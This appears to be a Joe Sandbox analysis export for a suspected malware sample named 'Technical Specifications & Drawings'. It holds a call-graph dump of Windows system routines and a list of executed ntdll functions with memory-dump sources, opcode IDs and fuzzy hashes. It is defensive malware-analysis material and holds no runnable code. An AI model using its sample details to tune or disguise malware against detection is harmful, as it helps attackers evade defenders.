18729f5 20011->20012 20017 1872a70 _vswprintf_s 20011->20017 20158 1873149 20011->20158 20013 1872a60 20012->20013 20014 1872a8c 20012->20014 20015 186a80d 28 API calls 20013->20015 20167 18725dd 20014->20167 20015->20017 20017->19995 20019 186bbbb 297 API calls 20018->20019 20022 186e567 20019->20022 20020 186e635 20021 186afde 34 API calls 20020->20021 20037 186e804 20020->20037 20021->20037 20022->20020 20025 186e618 20022->20025 20027 186a80d 28 API calls 20022->20027 20028 186e5f6 20022->20028 20023 186a854 34 API calls 20030 186e614 20023->20030 20024 186bcd2 279 API calls 20024->20020 20025->20020 20025->20024 20026 186e68f 20029 186a854 34 API calls 20026->20029 20027->20028 20028->20023 20032 186e6ae 20029->20032 20030->20025 20030->20026 20031 186a80d 28 API calls 20030->20031 20031->20026 20032->20025 20033 17c7d50 GetPEB 20032->20033 20034 186e7a8 20033->20034 20035 186e7c0 20034->20035 20036 186e7ac GetPEB 20034->20036 20035->20037 20038 185fec0 14 API calls 20035->20038 20036->20035 20037->19995 20038->20025 20040 186c915 20039->20040 20041 186c94b 20039->20041 20040->20041 20059 186c43e 20040->20059 20041->20007 20052 186d15d 20043->20052 20044 186d29e 20077 186d38e 20044->20077 20046 186d2ac 20051 186d2c1 20046->20051 20082 186dbd2 20046->20082 20049 186d2d8 20053 186d38e 15 API calls 20049->20053 20050 186d31c 20055 186d330 20050->20055 20097 186c52d 20050->20097 20051->20050 20091 186c7a2 20051->20091 20052->20044 20052->20049 20052->20051 20065 186d616 20052->20065 20056 186d2e8 20053->20056 20055->20008 20056->20051 20058 186dbd2 262 API calls 20056->20058 20058->20051 20061 186c46c 20059->20061 20064 186c4bf _vswprintf_s 20059->20064 20060 17eb640 _vswprintf_s 12 API calls 20062 186c529 20060->20062 20063 186c490 RtlDebugPrintTimes 20061->20063 20061->20064 20062->20041 20063->20064 20064->20060 20066 186d651 20065->20066 20067 186d733 RtlDebugPrintTimes 20066->20067 20068 186d751 20066->20068 20067->20068 20069 186d7b1 RtlDebugPrintTimes 20068->20069 20070 186d7ca 20068->20070 20071 186d757 20068->20071 20069->20070 20074 186d7ce 20070->20074 20101 186def6 20070->20101 20072 17eb640 _vswprintf_s 12 API calls 20071->20072 20073 186d85e 20072->20073 20073->20052 20074->20071 20076 186d81f RtlDebugPrintTimes 20074->20076 20076->20071 20119 17a774a 20077->20119 20079 186d3d2 20081 186d419 20079->20081 20124 186d466 20079->20124 20081->20046 20083 186dd1f 20082->20083 20084 186dc12 20082->20084 20085 186dcca 20083->20085 20089 186c52d 247 API calls 20083->20089 20084->20085 20086 186dcb2 20084->20086 20088 186dcd1 20084->20088 20085->20051 20087 186a80d 28 API calls 20086->20087 20087->20085 20088->20083 20130 186d8df 20088->20130 20089->20085 20094 186c7c6 _vswprintf_s 20091->20094 20092 17eb640 _vswprintf_s 12 API calls 20093 186c87f 20092->20093 20093->20050 20096 186c863 20094->20096 20138 186c59e RtlDebugPrintTimes 20094->20138 20096->20092 20100 186c548 20097->20100 20098 186c595 20098->20055 20100->20098 20142 186db14 20100->20142 20102 186dfe8 20101->20102 20105 186a6b3 20102->20105 20110 17d1164 20105->20110 20108 17d1164 14 API calls 20109 186a6d7 20108->20109 20109->20074 20111 1815490 20110->20111 20115 17d117f 20110->20115 20112 17e9670 _vswprintf_s LdrInitializeThunk 20111->20112 20112->20115 20116 17d5720 20115->20116 20117 17d4e70 14 API calls 20116->20117 20118 17d1185 20117->20118 20118->20108 20120 17a777a 20119->20120 20121 18028d8 20119->20121 20120->20079 20122 17d1164 14 API calls 20121->20122 20123 18028dd 20122->20123 20125 186d4bc 20124->20125 20126 186d4cc RtlDebugPrintTimes 20125->20126 20127 186d4c6 20125->20127 20126->20127 20128 17eb640 _vswprintf_s 12 API calls 20127->20128 20129 186d591 20128->20129 20129->20081 20133 186d917 20130->20133 20131 17eb640 _vswprintf_s 12 API calls 20132 186da95 20131->20132 20132->20083 20134 184da47 244 API calls 20133->20134 20136 186da54 20133->20136 20137 186d96d 20133->20137 20134->20137 20135 186d9ed RtlDebugPrintTimes 20135->20137 20136->20131 20137->20135 20137->20136 20139 186c5cb 20138->20139 20140 17eb640 _vswprintf_s 12 API calls 20139->20140 20141 186c5f9 20140->20141 20141->20096 20143 186dbae 20142->20143 20146 186db4f 20142->20146 20150 186c95a 20143->20150 20145 186dbac 20148 17eb640 _vswprintf_s 12 API calls 20145->20148 20147 186db90 RtlDebugPrintTimes 20146->20147 20147->20145 20149 186dbcc 20148->20149 20149->20098 20151 186c9e8 20150->20151 20155 186c99f 20150->20155 20152 186d8df 245 API calls 20151->20152 20153 186c9e4 20152->20153 20156 17eb640 _vswprintf_s 12 API calls 20153->20156 20154 186c9c6 RtlDebugPrintTimes 20154->20153 20155->20154 20157 186ca15 20156->20157 20157->20145 20159 187318c 20158->20159 20160 1873169 RtlDebugPrintTimes 20159->20160 20161 18731d4 RtlDebugPrintTimes 20159->20161 20163 187319a 20159->20163 20160->20159 20161->20163 20162 18731a0 RtlDebugPrintTimes 20165 18731bf 20162->20165 20163->20162 20163->20165 20164 17eb640 _vswprintf_s 12 API calls 20166 18731ce 20164->20166 20165->20164 20166->20011 20169 1872603 20167->20169 20168 187286b 20168->20017 20170 18727a5 20169->20170 20173 1872fbd 20169->20173 20170->20168 20180 187241a 20170->20180 20174 1872fe4 20173->20174 20175 1873074 RtlDebugPrintTimes 20174->20175 20176 18730a2 RtlDebugPrintTimes 20174->20176 20177 1873089 20175->20177 20176->20177 20178 17eb640 _vswprintf_s 12 API calls 20177->20178 20179 18730f0 20178->20179 20179->20170 20181 187242f 20180->20181 20183 187246c 20181->20183 20184 18722ae 20181->20184 20183->20168 20185 18722dd 20184->20185 20186 1872fbd 14 API calls 20185->20186 20187 18723ee 20185->20187 20186->20187 20187->20181 20189 187e669 _vswprintf_s 20188->20189 20190 187e66f 20189->20190 20193 187e704 20189->20193 20203 187e824 20189->20203 20191 17eb640 _vswprintf_s 12 API calls 20190->20191 20192 187e725 20191->20192 20192->19424 20193->20190 20194 187e5b6 14 API calls 20193->20194 20194->20190 20197 187e5e1 20196->20197 20198 187e608 RtlDebugPrintTimes 20196->20198 20197->20198 20215 187ed52 20197->20215 20199 187e619 20198->20199 20201 17eb640 _vswprintf_s 12 API calls 20199->20201 20202 187e626 20201->20202 20202->19420 20204 187e853 20203->20204 20205 187e9fb RtlDebugPrintTimes 20204->20205 20206 187e9d6 20204->20206 20211 187ea18 _vswprintf_s 20205->20211 20207 17eb640 _vswprintf_s 12 API calls 20206->20207 20208 187ed3b 20207->20208 20208->20189 20209 187eb19 20209->20206 20210 187ed1b RtlDebugPrintTimes 20209->20210 20210->20206 20211->20206 20211->20209 20212 187eb7a RtlDebugPrintTimes 20211->20212 20214 187eb90 20212->20214 20213 187ec9d RtlDebugPrintTimes 20213->20209 20214->20209 20214->20213 20219 187ed73 20215->20219 20216 187ee58 20217 17eb640 _vswprintf_s 12 API calls 20216->20217 20218 187ee6d 20217->20218 20218->20197 20219->20216 20220 187ee47 RtlDebugPrintTimes 20219->20220 20220->20216 20222 186bbbb 298 API calls 20221->20222 20223 186016d 20222->20223 20223->19431 20224 1860180 20223->20224 20225 186bcd2 279 API calls 20224->20225 20226 1860199 20225->20226 20226->19431 20228 186ae6a 20227->20228 20231 186af3d 20228->20231 20234 186af27 20228->20234 20244 186af38 20228->20244 20229 186afc3 20267 186fde2 20229->20267 20230 186af6c 20245 186ea55 20230->20245 20231->20229 20231->20230 20236 186a80d 28 API calls 20234->20236 20236->20244 20237 17c7d50 GetPEB 20238 186af85 20237->20238 20239 186af89 GetPEB 20238->20239 20240 186af99 20238->20240 20239->20240 20241 186afa3 GetPEB 20240->20241 20240->20244 20242 186afb2 20241->20242 20241->20244 20242->20244 20260 1861608 20242->20260 20244->19393 20246 186ea74 20245->20246 20247 186ea8d 20246->20247 20249 186eab0 20246->20249 20248 186a80d 28 API calls 20247->20248 20250 186af7a 20248->20250 20251 186afde 34 API calls 20249->20251 20250->20237 20252 186eb12 20251->20252 20253 186bcd2 278 API calls 20252->20253 20254 186eb3d 20253->20254 20255 17c7d50 GetPEB 20254->20255 20256 186eb48 20255->20256 20257 186eb60 20256->20257 20258 186eb4c GetPEB 20256->20258 20257->20250 20259 185fe3f 14 API calls 20257->20259 20258->20257 20259->20250 20261 17c7d50 GetPEB 20260->20261 20262 1861634 20261->20262 20263 1861638 GetPEB 20262->20263 20264 1861648 _vswprintf_s 20262->20264 20263->20264 20265 17eb640 _vswprintf_s 12 API calls 20264->20265 20266 186166b 20265->20266 20266->20244 20268 186fdf5 20267->20268 20269 186fe12 20268->20269 20270 186fdfe 20268->20270 20271 186fe2c 20269->20271 20272 186febd 20269->20272 20273 186a80d 28 API calls 20270->20273 20274 186fe45 20271->20274 20275 186fe35 20271->20275 20276 1870a13 249 API calls 20272->20276 20277 186fe0d 20273->20277 20296 1872b28 20274->20296 20278 186dbd2 262 API calls 20275->20278 20280 186fecb 20276->20280 20277->20244 20281 186fe41 20278->20281 20283 17c7d50 GetPEB 20280->20283 20287 17c7d50 GetPEB 20281->20287 20282 186fe55 20282->20281 20288 186c8f7 13 API calls 20282->20288 20284 186fed3 20283->20284 20285 186fee7 20284->20285 20286 186fed7 GetPEB 20284->20286 20285->20277 20290 186fef1 GetPEB 20285->20290 20286->20285 20289 186fe77 20287->20289 20288->20281 20291 186fe7b GetPEB 20289->20291 20292 186fe8b 20289->20292 20290->20277 20294 186fea4 20290->20294 20291->20292 20292->20277 20293 186fe95 GetPEB 20292->20293 20293->20277 20293->20294 20294->20277 20295 1861608 14 API calls 20294->20295 20295->20277 20300 1872b46 20296->20300 20297 1872bd3 20301 1872c36 20297->20301 20302 1872c15 20297->20302 20298 1872bbf 20299 186a80d 28 API calls 20298->20299 20306 1872bce 20299->20306 20300->20297 20300->20298 20303 187241a 14 API calls 20301->20303 20304 186a80d 28 API calls 20302->20304 20305 1872c4a 20303->20305 20304->20306 20305->20306 20308 1873209 RtlDebugPrintTimes 20305->20308 20306->20282 20309 1873242 20308->20309 20310 17eb640 _vswprintf_s 12 API calls 20309->20310 20311 187324d 20310->20311 20311->20306 19345 17a9240 19346 17a924c _vswprintf_s 19345->19346 19347 17a925f 19346->19347 19363 17e95d0 LdrInitializeThunk 19346->19363 19364 17a9335 19347->19364 19351 17a9335 LdrInitializeThunk 19352 17a9276 19351->19352 19369 17e95d0 LdrInitializeThunk 19352->19369 19354 17a927e GetPEB 19355 17c77f0 19354->19355 19356 17a929a GetPEB 19355->19356 19357 17c77f0 19356->19357 19358 17a92b6 GetPEB 19357->19358 19360 17a92d2 19358->19360 19359 17a9330 19360->19359 19361 17a9305 GetPEB 19360->19361 19362 17a931f _vswprintf_s 19361->19362 19363->19347 19370 17e95d0 LdrInitializeThunk 19364->19370 19366 17a9342 19371 17e95d0 LdrInitializeThunk 19366->19371 19368 17a926b 19368->19351 19369->19354 19370->19366 19371->19368 18491 17e9540 LdrInitializeThunk

                                                  Executed Functions

                                                  Function 017E9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 14 17e9910-17e991c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 7a840c72da028147af10cbc7b3acc407d982920d0927bc8a307ae90b0f345b26
                                                  • Instruction ID: 79bfb01dda80238b58b22cfdabe9816f68e2e36efac01f065d6c790aa17fe767
                                                  • Opcode Fuzzy Hash: 7a840c72da028147af10cbc7b3acc407d982920d0927bc8a307ae90b0f345b26
                                                  • Instruction Fuzzy Hash: E99002B120500406D150719984047474005A7D4341F52C025A6054564EC6998DD5B6A6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 15 17e99a0-17e99ac LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a71dab169c405e3026ff0082e042079728becc7b046c0105f458a44a468f4a8d
                                                  • Instruction ID: 692d4e9027130b635d80960ab71a131b92217d6fec7b8c8b75d790e598efbc57
                                                  • Opcode Fuzzy Hash: a71dab169c405e3026ff0082e042079728becc7b046c0105f458a44a468f4a8d
                                                  • Instruction Fuzzy Hash: 729002A134500446D11061998414B074005E7E5341F52C029E2054564DC659CC52B167
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 12 17e9860-17e986c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 93862c761c16f5723d4f434f2fe1d8fea166b688e6d2dc26ca7dce802be9ce4d
                                                  • Instruction ID: 0daf39be8af24363e99b2e50f419793b5b4234a2f216ef81fa7c5e1af2ef847e
                                                  • Opcode Fuzzy Hash: 93862c761c16f5723d4f434f2fe1d8fea166b688e6d2dc26ca7dce802be9ce4d
                                                  • Instruction Fuzzy Hash: F390027120500417D121619985047074009A7D4281F92C426A1414568DD6968952F162
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 11 17e9840-17e984c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 321fae458367e9be184f099e5dedf400821e63a3e69267b1bae76304ae609c2a
                                                  • Instruction ID: 2ebc8b6ba58e70170362992cd9c1066f9e0d399a7bdc0e420da48929e53eea4d
                                                  • Opcode Fuzzy Hash: 321fae458367e9be184f099e5dedf400821e63a3e69267b1bae76304ae609c2a
                                                  • Instruction Fuzzy Hash: 1F900261246041565555B19984046078006B7E4281792C026A2404960CC5669856F662
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E98F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 13 17e98f0-17e98fc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 47449af7ebab8992bdfd7abdc2e313390985503f70b64f56a9c64040bd07dcc7
                                                  • Instruction ID: 7a66c694599a4da42799626b62d2572db962246eeb0c162d2e5ae0881427e0da
                                                  • Opcode Fuzzy Hash: 47449af7ebab8992bdfd7abdc2e313390985503f70b64f56a9c64040bd07dcc7
                                                  • Instruction Fuzzy Hash: CA90026160500506D11171998404717400AA7D4281F92C036A2014565ECA658992F172
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 2d61c5fb151b320fb1002956d3e033294c845bb5784d743ef75edcc80a2380f5
                                                  • Instruction ID: 40c15c6c000b8c642820b464d391d426c63e9d0a9f2f8ae241a0cb09ddda78e6
                                                  • Opcode Fuzzy Hash: 2d61c5fb151b320fb1002956d3e033294c845bb5784d743ef75edcc80a2380f5
                                                  • Instruction Fuzzy Hash: 8690026121580046D21065A98C14B074005A7D4343F52C129A1144564CC9558861B562
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E9A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 17 17e9a20-17e9a2c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ca34a45756cd442ea7c5debef6f6e4dde616f2066c3d381045c18c693430b99b
                                                  • Instruction ID: 24d67dc8972e1af86650f1bc858031b173c65cbc7f6345431267b0e2890b1e53
                                                  • Opcode Fuzzy Hash: ca34a45756cd442ea7c5debef6f6e4dde616f2066c3d381045c18c693430b99b
                                                  • Instruction Fuzzy Hash: C290026160500046415071A9C844A078005BBE5251752C135A1988560DC5998865B6A6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 16 17e9a00-17e9a0c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ceba40530cd5d0353b2e5c277cb7dddcf9c034b6b3ab401f5ae3312c446dfb2e
                                                  • Instruction ID: dbaca7f71cdd81e77ffc9a7170ee19cf26080f98205ae2c932267a697b9e5286
                                                  • Opcode Fuzzy Hash: ceba40530cd5d0353b2e5c277cb7dddcf9c034b6b3ab401f5ae3312c446dfb2e
                                                  • Instruction Fuzzy Hash: 2290027120540406D1106199881470B4005A7D4342F52C025A2154565DC6658851B5B2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 4 17e9540-17e954c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ea1f50b69f7228645a7b08d4e4fffe3a13df45c2f5b30a54090b1f87dd02931c
                                                  • Instruction ID: 1b087d1d7153a522c843f5565ab4d5450d4666402176500f13ae17aad2dfe818
                                                  • Opcode Fuzzy Hash: ea1f50b69f7228645a7b08d4e4fffe3a13df45c2f5b30a54090b1f87dd02931c
                                                  • Instruction Fuzzy Hash: 61900265215000070115A59947046074046A7D9391352C035F2005560CD6618861B162
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 5 17e95d0-17e95dc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8b44800cf08f842f72fb88862ea1e98355898cf7a02b91902231cfd2f80c776a
                                                  • Instruction ID: cea4dc60a500dfe39ddc8953b8e86cb6b0b175eeab2777071d804bb8fac96a67
                                                  • Opcode Fuzzy Hash: 8b44800cf08f842f72fb88862ea1e98355898cf7a02b91902231cfd2f80c776a
                                                  • Instruction Fuzzy Hash: 269002A120600007411571998414717800AA7E4241B52C035E20045A0DC5658891B166
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 8 17e9710-17e971c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 2ac3c1b293b150bda08e4a6c74af9c1aa8baad8a8b4e3b3f3c9452a6600eb6f7
                                                  • Instruction ID: b341a3c666ac67f5af788d237351bc4df6f00836017523207956357224445602
                                                  • Opcode Fuzzy Hash: 2ac3c1b293b150bda08e4a6c74af9c1aa8baad8a8b4e3b3f3c9452a6600eb6f7
                                                  • Instruction Fuzzy Hash: C690027120500406D11065D994087474005A7E4341F52D025A6014565EC6A58891B172
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 63e09bada1f5e7b61e8e263bcca82a4d6b9b6f78ee43e76a0665dc56066841d7
                                                  • Instruction ID: 07bc09cb192c1fe1049990ae516780b50b6023b79b8df43e1620e5a0f3b2c206
                                                  • Opcode Fuzzy Hash: 63e09bada1f5e7b61e8e263bcca82a4d6b9b6f78ee43e76a0665dc56066841d7
                                                  • Instruction Fuzzy Hash: 8A90027131514406D1206199C4047074005A7D5241F52C425A1814568DC6D58891B163
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 10 17e97a0-17e97ac LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: dae1093fbabab72f156b4035f7c2c8f7b69adb93272ede57d229eb0783020815
                                                  • Instruction ID: 77f7eddeef793d05265ec9a3afb894fa0d1a2d962412dcd40444f5b8879a497d
                                                  • Opcode Fuzzy Hash: dae1093fbabab72f156b4035f7c2c8f7b69adb93272ede57d229eb0783020815
                                                  • Instruction Fuzzy Hash: FD90026130500007D150719994187078005F7E5341F52D025E1404564CD9558856B263
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 9 17e9780-17e978c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
